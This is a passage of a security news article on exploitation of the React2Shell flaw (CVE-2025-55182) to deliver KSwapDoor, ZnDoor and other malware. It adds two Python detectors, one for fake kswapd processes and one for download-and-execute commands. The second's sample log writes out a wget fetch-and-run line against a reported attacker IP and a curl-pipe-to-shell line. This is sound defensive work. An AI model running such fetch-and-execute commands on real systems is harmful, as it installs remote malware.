The security vulnerability known as React2Shell is being exploited by threat actors to deliver malware families like KSwapDoor and ZnDoor, according to findings from Palo Alto Networks Unit 42 and NTT Security.
“KSwapDoor is a professionally engineered remote access tool designed with stealth in mind,” Justin Moore, senior manager of threat intel research at Palo Alto Networks Unit 42, said in a statement.
“It builds an internal mesh network, allowing compromised servers to talk to each other and evade security blocks. It uses military-grade encryption to hide its communications and, most alarmingly, features a ‘sleeper’ mode that lets attackers bypass firewalls by waking the malware up with a secret, invisible signal.”
Unit 42 noted that KSwapDoor was previously misclassified as BPFDoor. The Linux backdoor offers an interactive shell, command execution, file operations and lateral-movement scanning, and it impersonates the legitimate Linux kernel swap daemon (kswapd) to evade detection.
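A practitioner reading the kswapd impersonation claim will want a way to separate the genuine kernel thread from a user-space process that has merely renamed itself. The script below is an added example written for this page, not code from Unit 42 or from the KSwapDoor report, and it assumes a standard Linux /proc layout: real kswapd threads are kernel threads, so their /proc/<pid>/cmdline is empty, /proc/<pid>/exe has no target, and their parent is kthreadd (PID 2). A backdoor that only sets its name to "kswapd0" cannot fake all three. The SAMPLE records are constructed for illustration.

```python
"""Hunt for user-space processes masquerading as the kernel swap daemon.

Added example (not from the article or Unit 42). Assumes Linux /proc semantics:
kernel threads have an empty cmdline, no exe link target, and PPid 2 (kthreadd).
Run as root for a full view; unprivileged runs may miss other users' processes.
"""
import os
import re
from dataclasses import dataclass
from typing import List, Optional

# Matches kswapd0, kswapd1, ... with or without the brackets ps adds.
KSWAPD_NAME = re.compile(r"^\[?kswapd\d+\]?$")


@dataclass
class Proc:
    pid: int
    comm: str            # /proc/<pid>/comm
    ppid: int            # PPid field of /proc/<pid>/status
    cmdline: str         # /proc/<pid>/cmdline with NULs replaced by spaces
    exe: Optional[str]   # readlink(/proc/<pid>/exe), None when it has no target


def is_fake_kswapd(p: Proc) -> bool:
    """True if the process claims a kswapd name but shows user-space traits."""
    if not KSWAPD_NAME.match(p.comm):
        return False
    # A genuine kernel thread has no cmdline, no exe target and is parented by
    # kthreadd (PID 2); any one of these failing means a user-space impostor.
    return bool(p.cmdline.strip()) or p.exe is not None or p.ppid != 2


def find_fake_kswapd(procs: List[Proc]) -> List[Proc]:
    return [p for p in procs if is_fake_kswapd(p)]


def read_proc(pid: int) -> Optional[Proc]:
    """Build a Proc from /proc on a live Linux host."""
    base = f"/proc/{pid}"
    try:
        with open(f"{base}/comm") as f:
            comm = f.read().strip()
        with open(f"{base}/status") as f:
            m = re.search(r"^PPid:\s+(\d+)", f.read(), re.M)
        ppid = int(m.group(1)) if m else -1
        with open(f"{base}/cmdline", "rb") as f:
            cmdline = f.read().replace(b"\x00", b" ").decode(errors="replace")
    except OSError:
        return None  # process exited or is not readable
    try:
        exe = os.readlink(f"{base}/exe")
    except OSError:
        exe = None  # kernel threads (and zombies) have no exe target
    return Proc(pid, comm, ppid, cmdline, exe)


def scan_live_host() -> List[Proc]:
    procs = [read_proc(int(d)) for d in os.listdir("/proc") if d.isdigit()]
    return find_fake_kswapd([p for p in procs if p is not None])


# Constructed sample: one genuine kernel thread, one user-space impostor
# whose argv[0] was set to "[kswapd0]" so it looks bracketed in ps output.
SAMPLE = [
    Proc(pid=81, comm="kswapd0", ppid=2, cmdline="", exe=None),
    Proc(pid=4242, comm="kswapd0", ppid=1, cmdline="[kswapd0]", exe="/tmp/.x/kswapd0"),
]

if __name__ == "__main__":
    for p in scan_live_host():
        print(f"suspicious: pid={p.pid} comm={p.comm} ppid={p.ppid} exe={p.exe}")
```

The PPid check is the one an attacker cannot influence from user space: no user process can be a child of kthreadd. The exe and cmdline checks add coverage for hosts where /proc is mounted with hidepid or where the scan runs without root and some exe links are unreadable.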
In a related development, NTT Security said organizations in Japan are being targeted by attacks that exploit React2Shell to deploy ZnDoor, a malware family assessed to have been active in the wild since December 2023. The attack chain runs a bash command that fetches the payload from a remote server (45.76.155[.]14) with wget and executes it.
ZnDoor is a remote access trojan that contacts the same attacker-controlled infrastructure to receive commands and execute them on the host. Some of the supported commands are listed below –
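The fetch-and-execute one-liner in the ZnDoor chain is a pattern that can be flagged in command telemetry (auditd EXECVE records, shell history, EDR process events) without knowing the payload in advance. The detector below is an added example written for this page, not NTT Security's or the article's code: it looks for a wget or curl fetch combined with an execution step on the same command line and checks the fetched host against the IOC from the report. The log lines are constructed, and the example.org entry is a hypothetical host used only to show a hit on an unknown server.

```python
"""Flag download-and-execute one-liners in command logs.

Added example (not from the article or NTT Security). Input is a list of
command lines as they might appear in auditd/shell-history/EDR telemetry.
"""
import re
from typing import Dict, List

# IOC quoted in the report, kept defanged and refanged only for comparison.
KNOWN_C2 = {"45.76.155[.]14"}

# wget/curl, any number of flags, optional scheme, then the host.
FETCH = re.compile(
    r"\b(?:wget|curl)\s+(?:-{1,2}\S+\s+)*(?:https?://)?([0-9A-Za-z.\-]+)"
)
# Execution step on the same line: chmod +x, pipe into a shell, or running
# a path after && / ;
EXEC = re.compile(r"chmod\s+[ugoa]*\+?[rwx]*x|\|\s*(?:ba)?sh\b|(?:&&|;)\s*(?:\./|/)\S+")


def refang(ioc: str) -> str:
    return ioc.replace("[.]", ".")


def classify(cmd: str) -> Dict[str, object]:
    """Return fetch host, whether an exec step follows, and IOC match."""
    m = FETCH.search(cmd)
    host = m.group(1) if m else None
    return {
        "line": cmd,
        "host": host,
        "download_exec": host is not None and EXEC.search(cmd) is not None,
        "known_c2": host is not None and host in {refang(x) for x in KNOWN_C2},
    }


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Return only the lines that fetch something and then execute it."""
    return [r for r in map(classify, lines) if r["download_exec"]]


# Constructed sample telemetry (example.org is a hypothetical host).
SAMPLE_LOG = [
    "wget -q http://45.76.155.14/ld -O /tmp/ld && chmod +x /tmp/ld && /tmp/ld",
    "curl -fsSL http://example.org/install.sh | sh",
    "wget https://archive.ubuntu.com/foo.tar.gz",
    "ls -la /tmp",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        tag = "KNOWN C2" if hit["known_c2"] else "unknown host"
        print(f"[{tag}] {hit['host']}: {hit['line']}")
```

A plain download (the archive.ubuntu.com line) is not flagged on its own; the signal is the combination of fetch and execute in one command, which is exactly what the React2Shell post-exploitation one-liner looks like. In production the `known_c2` check would be backed by a threat-intel feed rather than a hard-coded set.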
- shell, to execute a command
- interactive_shell, to launch an interactive shell
- explorer, to get a list of directories
- explorer_cat, to read and display a file
- explorer_delete, to delete a file
- explorer_upload, to download a file from the server
- explorer_download, to send files to the server
- system, to gather system information
- change_timefile, to change the timestamp of a file
- socket_quick_startstreams, to start a SOCKS5 proxy
- start_in_port_forward, to start port forwarding
- stop_in_port, to stop port forwarding
The disclosure comes as the vulnerability, tracked as CVE-2025-55182 (CVSS score: 10.0), has been exploited by multiple threat actors, with Google identifying at least five China-nexus groups that have weaponized it to deliver an array of payloads –
- UNC6600 to deliver a tunneling utility named MINOCAT
- UNC6586 to deliver a downloader named SNOWLIGHT
- UNC6588 to deliver a backdoor named COMPOOD
- UNC6603 to deliver an updated version of a Go backdoor named HISONIC that uses Cloudflare Pages and GitLab to retrieve encrypted configuration and blend in with legitimate network activity
- UNC6595 to deliver a Linux version of ANGRYREBEL (aka Noodle RAT)
Microsoft, in its own advisory for CVE-2025-55182, said threat actors have taken advantage of the flaw to run arbitrary commands for post-exploitation, including setting up reverse shells to known Cobalt Strike servers, and then dropping remote…